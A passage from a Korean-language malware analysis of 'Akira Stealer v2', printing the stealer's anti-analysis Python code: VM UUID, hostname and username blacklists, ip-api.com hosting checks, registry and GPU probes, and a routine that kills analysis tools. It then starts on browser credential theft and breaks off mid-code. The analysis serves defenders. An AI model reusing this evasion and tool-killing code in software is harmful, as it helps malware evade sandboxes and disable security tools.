VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[578,5289,5290,5294,5299,5304,5309,5313,5318,5323,5328,5333],{"__ignoreMap":530},[1706,5291,5292],{"class":1708,"line":1709},[1706,5293,5006],{},[1706,5295,5296],{"class":1708,"line":531},[1706,5297,5298],{},"def checkUsers() -> bool:\n",[1706,5300,5301],{"class":1708,"line":2091},[1706,5302,5303],{},"    user = os.getlogin().lower()\n",[1706,5305,5306],{"class":1708,"line":2097},[1706,5307,5308],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[1706,5310,5311],{"class":1708,"line":2419},[1706,5312,3871],{"emptyLinePlaceholder":325},[1706,5314,5315],{"class":1708,"line":2425},[1706,5316,5317],{},"BLACKLISTED_USERS = (\n",[1706,5319,5320],{"class":1708,"line":3081},[1706,5321,5322],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[1706,5324,5325],{"class":1708,"line":3874},[1706,5326,5327],{},"    'a.monaldo','tvm',\n",[1706,5329,5330],{"class":1708,"line":3880},[1706,5331,5332],{},"    # ... 30+ more entries ...\n",[1706,5334,5335],{"class":1708,"line":4129},[1706,5336,5272],{},[526,5338,5339],{},"이 검사는 재부팅이나 가상 머신 스냅샷 전반에서도 변하지 않을 수 있는 사용자 컨텍스트에 초점을 맞춰 탐지를 강화합니다.",[888,5341,5343],{"id":5342},"_738-호스팅-검사-퍼블릭-클라우드-인프라-탐지","7.3.8 호스팅 검사 – 퍼블릭 클라우드 인프라 탐지",[526,5345,894],{},[526,5347,5348,5349,5352],{},"일부 멀웨어는 외부 IP 인텔리전스 서비스를 사용해 감염된 시스템이 알려진 데이터 센터나 클라우드 제공자 환경에 있는지 확인합니다. 이 경우, ",[578,5350,5351],{},"ip-api.com","에 간단한 HTTP 요청을 보내 해당 IP가 \"hosting\"으로 플래그되었는지 묻습니다.",[615,5354,5356],{"className":4515,"code":5355,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[578,5357,5358,5362,5367,5372,5376,5381,5386,5391,5396,5400],{"__ignoreMap":530},[1706,5359,5360],{"class":1708,"line":1709},[1706,5361,5006],{},[1706,5363,5364],{"class":1708,"line":531},[1706,5365,5366],{},"def checkHosting() -> bool:\n",[1706,5368,5369],{"class":1708,"line":2091},[1706,5370,5371],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[1706,5373,5374],{"class":1708,"line":2097},[1706,5375,5169],{},[1706,5377,5378],{"class":1708,"line":2419},[1706,5379,5380],{},"        return http.request(\n",[1706,5382,5383],{"class":1708,"line":2425},[1706,5384,5385],{},"            'GET',\n",[1706,5387,5388],{"class":1708,"line":3081},[1706,5389,5390],{},"            'http://ip-api.com/line/?fields=hosting'\n",[1706,5392,5393],{"class":1708,"line":3874},[1706,5394,5395],{},"        ).data.decode().strip() == 'true'\n",[1706,5397,5398],{"class":1708,"line":3880},[1706,5399,5194],{},[1706,5401,5402],{"class":1708,"line":4129},[1706,5403,5404],{},"        return False\n",[526,5406,5407],{},"이는 멀웨어가 Microsoft Azure, AWS, DigitalOcean 등이 소유한 인프라에서 실행 중인지 판단할 수 있게 합니다. 샌드박싱의 위험 신호입니다.",[888,5409,5411],{"id":5410},"_739-https-시뮬레이션-검사-ssl-인터셉션-탐침","7.3.9 HTTPS 시뮬레이션 검사 – SSL 인터셉션 탐침",[526,5413,894],{},[526,5415,5416,5417,5420],{},"SSL 검사가 이루어지는 환경(기업이나 연구 네트워크에서 흔함)을 식별하기 위해, 멀웨어는 ",[578,5418,5419],{},".in"," 아래의 무작위 하위 도메인에 무해한 HTTPS 요청을 보냅니다. DNS 필터링, 인터셉션 프록시, 인증서 피닝 실패 등으로 연결이 실패하면, 이는 멀웨어가 분석되고 있다는 신호일 수 있습니다.",[615,5422,5424],{"className":4515,"code":5423,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return True\n",[578,5425,5426,5430,5435,5440,5444,5449,5453,5457],{"__ignoreMap":530},[1706,5427,5428],{"class":1708,"line":1709},[1706,5429,5006],{},[1706,5431,5432],{"class":1708,"line":531},[1706,5433,5434],{},"def checkHTTPSimulation() -> bool:\n",[1706,5436,5437],{"class":1708,"line":2091},[1706,5438,5439],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[1706,5441,5442],{"class":1708,"line":2097},[1706,5443,5169],{},[1706,5445,5446],{"class":1708,"line":2419},[1706,5447,5448],{},"        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[1706,5450,5451],{"class":1708,"line":2425},[1706,5452,5194],{},[1706,5454,5455],{"class":1708,"line":3081},[1706,5456,5404],{},[1706,5458,5459],{"class":1708,"line":3874},[1706,5460,5461],{},"    return True\n",[526,5463,5464],{},"이 미묘한 접근은 경보를 트리거하거나 전용 인프라를 요구하지 않고 네트워크 경로의 무결성을 시험합니다.",[888,5466,5468],{"id":5467},"_7310-레지스트리-및-gpu-드라이버-검사-가상-gpu-시그니처-탐지","7.3.10 레지스트리 및 GPU 드라이버 검사 – 가상 GPU 시그니처 탐지",[526,5470,894],{},[526,5472,5473,5474,5477],{},"특정 가상 환경은 레지스트리 키나 GPU 드라이버 디스크립터로 드러납니다. Akira는 이중 전략을 실행합니다. 그래픽 서브시스템에 연결된 레지스트리 항목을 조회하고, 별도로 ",[578,5475,5476],{},"wmic","의 출력에서 의심스러운 GPU 문자열을 검사합니다.",[615,5479,5481],{"className":4515,"code":5480,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[578,5482,5483,5487,5492,5497,5502,5507,5512,5517,5521,5525,5530,5535,5540,5545,5550,5555],{"__ignoreMap":530},[1706,5484,5485],{"class":1708,"line":1709},[1706,5486,5006],{},[1706,5488,5489],{"class":1708,"line":531},[1706,5490,5491],{},"def checkRegistry() -> bool:\n",[1706,5493,5494],{"class":1708,"line":2091},[1706,5495,5496],{},"    r1 = subprocess.run(\n",[1706,5498,5499],{"class":1708,"line":2097},[1706,5500,5501],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[1706,5503,5504],{"class":1708,"line":2419},[1706,5505,5506],{},"        capture_output=True, shell=True)\n",[1706,5508,5509],{"class":1708,"line":2425},[1706,5510,5511],{},"    r2 = subprocess.run(\n",[1706,5513,5514],{"class":1708,"line":3081},[1706,5515,5516],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[1706,5518,5519],{"class":1708,"line":3874},[1706,5520,5506],{},[1706,5522,5523],{"class":1708,"line":3880},[1706,5524,3871],{"emptyLinePlaceholder":325},[1706,5526,5527],{"class":1708,"line":4129},[1706,5528,5529],{},"    # GPU name check\n",[1706,5531,5532],{"class":1708,"line":5054},[1706,5533,5534],{},"    gpu_out = subprocess.run(\n",[1706,5536,5537],{"class":1708,"line":5060},[1706,5538,5539],{},"        \"wmic path win32_VideoController get name\",\n",[1706,5541,5542],{"class":1708,"line":5066},[1706,5543,5544],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[1706,5546,5547],{"class":1708,"line":5072},[1706,5548,5549],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[1706,5551,5552],{"class":1708,"line":5078},[1706,5553,5554],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[1706,5556,5557],{"class":1708,"line":5084},[1706,5558,5559],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[526,5561,5562],{},"이러한 하드웨어 계층 검사는 가상화된 디스플레이 어댑터를 완전히 가리지 못하는 분석가 환경에 특히 효과적입니다.",[888,5564,5566],{"id":5565},"_7311-작업-종료-실시간으로-분석-도구-억제","7.3.11 작업 종료 – 실시간으로 분석 도구 억제",[526,5568,894],{},[526,5570,5571],{},"Akira는 수동적으로 탐지를 회피하는 데 그치지 않고, 알려진 분석 또는 디버깅 도구를 능동적으로 종료함으로써 한 걸음 더 나아갑니다. 백그라운드 스레드를 분리 실행하여 프로세스 목록을 순회하고 일치하는 것을 모두 종료합니다.",[615,5573,5575],{"className":4515,"code":5574,"language":4517,"meta":530,"style":530},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... dozens more ...\n  'glasswire','requestly'\n)\n",[578,5576,5577,5581,5586,5591,5595,5600,5605,5610,5615],{"__ignoreMap":530},[1706,5578,5579],{"class":1708,"line":1709},[1706,5580,5006],{},[1706,5582,5583],{"class":1708,"line":531},[1706,5584,5585],{},"def killTasks() -> None:\n",[1706,5587,5588],{"class":1708,"line":2091},[1706,5589,5590],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[1706,5592,5593],{"class":1708,"line":2097},[1706,5594,3871],{"emptyLinePlaceholder":325},[1706,5596,5597],{"class":1708,"line":2419},[1706,5598,5599],{},"BLACKLISTED_TASKS = (\n",[1706,5601,5602],{"class":1708,"line":2425},[1706,5603,5604],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[1706,5606,5607],{"class":1708,"line":3081},[1706,5608,5609],{},"  # ... dozens more ...\n",[1706,5611,5612],{"class":1708,"line":3874},[1706,5613,5614],{},"  'glasswire','requestly'\n",[1706,5616,5617],{"class":1708,"line":3880},[1706,5618,5272],{},[526,5620,5621],{},"인시던트 대응자와 멀웨어 분석가가 흔히 사용하는 이 도구들은 의미 있는 행위 아티팩트를 수집하기 전에 무력화됩니다.",[526,5623,5624],{},[567,5625,5626],{},"요약",[526,5628,5629],{},"Akira는 환경 변수와 레지스트리 키부터 네트워크 탐침과 작업 목록에 이르기까지 여러 시스템 계층을 겨냥하는 정교한 분석 방해 기법 모음을 사용합니다. 이 메커니즘들은 자동화된 샌드박스와 수동 검사 환경 모두를 탐지하고 회피하도록 설계되었습니다.",[526,5631,5632],{},"수동적 지문 채취와 능동적 억제(예: 작업 종료)의 조합은 중급 멀웨어 계열조차 이제 다층 회피 로직을 통합하고 있음을 보여 줍니다.",[888,5634,5636],{"id":5635},"_7312-전체-블랙리스트-및-탐지-함수","7.3.12 전체 블랙리스트 및 탐지 함수",[526,5638,894],{},[526,5640,5641],{},[567,5642,5643],{},"블랙리스트에 등록된 하드웨어 UUID",[615,5645,5648],{"className":5646,"code":5647,"language":620},[618],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[578,5649,5647],{"__ignoreMap":530},[526,5651,5652],{},[567,5653,5654],{},"블랙리스트에 등록된 컴퓨터 이름",[615,5656,5659],{"className":5657,"code":5658,"language":620},[618],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[578,5660,5658],{"__ignoreMap":530},[526,5662,5663],{},[567,5664,5665],{},"블랙리스트에 등록된 사용자 계정",[615,5667,5670],{"className":5668,"code":5669,"language":620},[618],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[578,5671,5669],{"__ignoreMap":530},[526,5673,5674],{},[567,5675,5676],{},"블랙리스트에 등록된 분석 도구 프로세스",[615,5678,5681],{"className":5679,"code":5680,"language":620},[618],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[578,5682,5680],{"__ignoreMap":530},[526,5684,5685],{},[567,5686,5687],{},"핵심 탐지 메서드",[615,5689,5691],{"className":4515,"code":5690,"language":4517,"meta":530,"style":530},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[578,5692,5693,5697,5701,5706,5710,5714,5719,5724,5729,5733,5737,5741,5745,5749,5753,5758,5763,5767,5771,5775,5780,5785,5789,5793,5797,5802,5807,5812,5817,5823,5828,5833,5838,5843,5848,5853,5859,5865,5871,5876,5881,5886,5891,5897,5902,5907,5912,5917,5922,5927,5933,5939,5945,5951,5956,5961,5967,5973,5979,5985,5990,5995,6001,6006,6011,6017,6023,6029,6034,6040,6046,6051,6057,6063,6068,6073,6078,6084],{"__ignoreMap":530},[1706,5694,5695],{"class":1708,"line":1709},[1706,5696,5006],{},[1706,5698,5699],{"class":1708,"line":531},[1706,5700,5164],{},[1706,5702,5703],{"class":1708,"line":2091},[1706,5704,5705],{},"    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[1706,5707,5708],{"class":1708,"line":2097},[1706,5709,5169],{},[1706,5711,5712],{"class":1708,"line":2419},[1706,5713,5174],{},[1706,5715,5716],{"class":1708,"line":2425},[1706,5717,5718],{},"            \"wmic csproduct get uuid\",\n",[1706,5720,5721],{"class":1708,"line":3081},[1706,5722,5723],{},"            shell=True, capture_output=True\n",[1706,5725,5726],{"class":1708,"line":3874},[1706,5727,5728],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[1706,5730,5731],{"class":1708,"line":3880},[1706,5732,5194],{},[1706,5734,5735],{"class":1708,"line":4129},[1706,5736,5199],{},[1706,5738,5739],{"class":1708,"line":5054},[1706,5740,5204],{},[1706,5742,5743],{"class":1708,"line":5060},[1706,5744,3871],{"emptyLinePlaceholder":325},[1706,5746,5747],{"class":1708,"line":5066},[1706,5748,5006],{},[1706,5750,5751],{"class":1708,"line":5072},[1706,5752,5233],{},[1706,5754,5755],{"class":1708,"line":5078},[1706,5756,5757],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[1706,5759,5760],{"class":1708,"line":5084},[1706,5761,5762],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1706,5764,5765],{"class":1708,"line":5090},[1706,5766,3871],{"emptyLinePlaceholder":325},[1706,5768,5769],{"class":1708,"line":5096},[1706,5770,5006],{},[1706,5772,5773],{"class":1708,"line":5102},[1706,5774,5298],{},[1706,5776,5777],{"class":1708,"line":5108},[1706,5778,5779],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[1706,5781,5782],{"class":1708,"line":5114},[1706,5783,5784],{},"    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[1706,5786,5787],{"class":1708,"line":5120},[1706,5788,3871],{"emptyLinePlaceholder":325},[1706,5790,5791],{"class":1708,"line":5126},[1706,5792,5006],{},[1706,5794,5795],{"class":1708,"line":5132},[1706,5796,5366],{},[1706,5798,5799],{"class":1708,"line":5138},[1706,5800,5801],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[1706,5803,5805],{"class":1708,"line":5804},26,[1706,5806,5371],{},[1706,5808,5810],{"class":1708,"line":5809},27,[1706,5811,5169],{},[1706,5813,5815],{"class":1708,"line":5814},28,[1706,5816,5380],{},[1706,5818,5820],{"class":1708,"line":5819},29,[1706,5821,5822],{},"            'GET', 'http://ip-api.com/line/?fields=hosting'\n",[1706,5824,5826],{"class":1708,"line":5825},30,[1706,5827,5395],{},[1706,5829,5831],{"class":1708,"line":5830},31,[1706,5832,5194],{},[1706,5834,5836],{"class":1708,"line":5835},32,[1706,5837,5404],{},[1706,5839,5841],{"class":1708,"line":5840},33,[1706,5842,3871],{"emptyLinePlaceholder":325},[1706,5844,5846],{"class":1708,"line":5845},34,[1706,5847,5006],{},[1706,5849,5851],{"class":1708,"line":5850},35,[1706,5852,5434],{},[1706,5854,5856],{"class":1708,"line":5855},36,[1706,5857,5858],{},"    \"\"\"\n",[1706,5860,5862],{"class":1708,"line":5861},37,[1706,5863,5864],{},"    Attempt TLS to random subdomain.\n",[1706,5866,5868],{"class":1708,"line":5867},38,[1706,5869,5870],{},"    Failure → possible HTTPS interception/sandbox.\n",[1706,5872,5874],{"class":1708,"line":5873},39,[1706,5875,5858],{},[1706,5877,5879],{"class":1708,"line":5878},40,[1706,5880,5439],{},[1706,5882,5884],{"class":1708,"line":5883},41,[1706,5885,5169],{},[1706,5887,5889],{"class":1708,"line":5888},42,[1706,5890,5448],{},[1706,5892,5894],{"class":1708,"line":5893},43,[1706,5895,5896],{},"        return True\n",[1706,5898,5900],{"class":1708,"line":5899},44,[1706,5901,5194],{},[1706,5903,5905],{"class":1708,"line":5904},45,[1706,5906,5404],{},[1706,5908,5910],{"class":1708,"line":5909},46,[1706,5911,3871],{"emptyLinePlaceholder":325},[1706,5913,5915],{"class":1708,"line":5914},47,[1706,5916,5006],{},[1706,5918,5920],{"class":1708,"line":5919},48,[1706,5921,5491],{},[1706,5923,5925],{"class":1708,"line":5924},49,[1706,5926,5858],{},[1706,5928,5930],{"class":1708,"line":5929},50,[1706,5931,5932],{},"    Look for VirtualBox/VMware in:\n",[1706,5934,5936],{"class":1708,"line":5935},51,[1706,5937,5938],{},"    - Registry driver entries\n",[1706,5940,5942],{"class":1708,"line":5941},52,[1706,5943,5944],{},"    - Video card name via WMIC\n",[1706,5946,5948],{"class":1708,"line":5947},53,[1706,5949,5950],{},"    - Presence of VM-specific folders\n",[1706,5952,5954],{"class":1708,"line":5953},54,[1706,5955,5858],{},[1706,5957,5959],{"class":1708,"line":5958},55,[1706,5960,5496],{},[1706,5962,5964],{"class":1708,"line":5963},56,[1706,5965,5966],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[1706,5968,5970],{"class":1708,"line":5969},57,[1706,5971,5972],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[1706,5974,5976],{"class":1708,"line":5975},58,[1706,5977,5978],{},"        shell=True, capture_output=True\n",[1706,5980,5982],{"class":1708,"line":5981},59,[1706,5983,5984],{},"    )\n",[1706,5986,5988],{"class":1708,"line":5987},60,[1706,5989,5511],{},[1706,5991,5993],{"class":1708,"line":5992},61,[1706,5994,5966],{},[1706,5996,5998],{"class":1708,"line":5997},62,[1706,5999,6000],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[1706,6002,6004],{"class":1708,"line":6003},63,[1706,6005,5978],{},[1706,6007,6009],{"class":1708,"line":6008},64,[1706,6010,5984],{},[1706,6012,6014],{"class":1708,"line":6013},65,[1706,6015,6016],{},"    gpu = any(\n",[1706,6018,6020],{"class":1708,"line":6019},66,[1706,6021,6022],{},"        x.lower() in subprocess.run(\n",[1706,6024,6026],{"class":1708,"line":6025},67,[1706,6027,6028],{},"            \"wmic path win32_VideoController get name\",\n",[1706,6030,6032],{"class":1708,"line":6031},68,[1706,6033,5723],{},[1706,6035,6037],{"class":1708,"line":6036},69,[1706,6038,6039],{},"        ).stdout.decode().splitlines()[2].lower()\n",[1706,6041,6043],{"class":1708,"line":6042},70,[1706,6044,6045],{},"        for x in (\"virtualbox\", \"vmware\")\n",[1706,6047,6049],{"class":1708,"line":6048},71,[1706,6050,5984],{},[1706,6052,6054],{"class":1708,"line":6053},72,[1706,6055,6056],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[1706,6058,6060],{"class":1708,"line":6059},73,[1706,6061,6062],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[1706,6064,6066],{"class":1708,"line":6065},74,[1706,6067,3871],{"emptyLinePlaceholder":325},[1706,6069,6071],{"class":1708,"line":6070},75,[1706,6072,5006],{},[1706,6074,6076],{"class":1708,"line":6075},76,[1706,6077,5585],{},[1706,6079,6081],{"class":1708,"line":6080},77,[1706,6082,6083],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[1706,6085,6087],{"class":1708,"line":6086},78,[1706,6088,5590],{},[888,6090,6092],{"id":6091},"_7313-실행-및-중단-로직","7.3.13 실행 및 중단 로직",[526,6094,894],{},[2105,6096,6097,6110,6123],{},[633,6098,6099,3282,6102,6105,6106,6109],{},[567,6100,6101],{},"초기화:",[578,6103,6104],{},"Akira.__init__()"," 생성자 내에서, 멀웨어는 즉시 ",[578,6107,6108],{},"VmProtect.isVM(1)","을 호출하여 빠르고 오버헤드가 낮은 가상화 검사(예: 호스트명, 사용자, HTTPS 시뮬레이션)를 수행합니다.",[633,6111,6112,6115,6116,6119,6120,6122],{},[567,6113,6114],{},"심층 검사:"," 초기 테스트를 통과하면, ",[578,6117,6118],{},"VmProtect.isVM(2)","를 호출하여 하드웨어 UUID 검증, ",[578,6121,5351],{},"을 통한 호스팅 탐지, 레지스트리 아티팩트 스캔을 포함한 더 포괄적인 검사를 트리거합니다.",[633,6124,6125,6128,6129,6131,6132,6134],{},[567,6126,6127],{},"중단 경로:"," 어떤 검사든 ",[578,6130,4691],{},"를 반환하여 가상 또는 분석 환경임을 나타내면, 코드는 ",[578,6133,4695],{},"를 실행하여 어떤 데이터 수집이나 유출 루틴이 실행되기 전에 실행을 종료합니다.",[888,6136,6138],{"id":6137},"_7314-결론","7.3.14 결론",[526,6140,894],{},[526,6142,6143,6145,6146,6148],{},[4652,6144,676],{}," 의 ",[578,6147,4639],{}," 모듈은 로컬 시스템 지문과 네트워크 기반 휴리스틱을 모두 활용하여 분석에 대한 계층화된 방어를 보여 줍니다. 이러한 정확한 검사들을 이해하고 계측함으로써, 방어자는 판도를 뒤집어 운영 환경에서 이처럼 회피적인 멀웨어를 탐지할 수 있습니다.",[740,6150,6152],{"id":6151},"_74-브라우저-데이터-유출","7.4 브라우저 데이터 유출",[526,6154,746],{},[526,6156,6157,6158,2705,6161,6164],{},"Akira Stealer v2의 핵심 목표 중 하나는 브라우저에 저장된 민감 데이터의 대규모 추출입니다. 멀웨어는 ",[567,6159,6160],{},"Chromium 기반",[567,6162,6163],{},"Gecko 기반(Firefox)"," 브라우저를 모두 겨냥하는 맞춤 모듈을 구현합니다. 그 기능에는 저장된 암호, 쿠키, 신용카드 데이터, 자동 완성 항목, 심지어 전체 계정 하이재킹에 재사용될 수 있는 세션 토큰의 추출 및 복호화가 포함됩니다.",[526,6166,6167],{},[567,6168,6169],{},"1. 작업 공간 설정",[615,6171,6173],{"className":4515,"code":6172,"language":4517,"meta":530,"style":530},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[578,6174,6175,6180,6185,6190],{"__ignoreMap":530},[1706,6176,6177],{"class":1708,"line":1709},[1706,6178,6179],{},"client_dir = 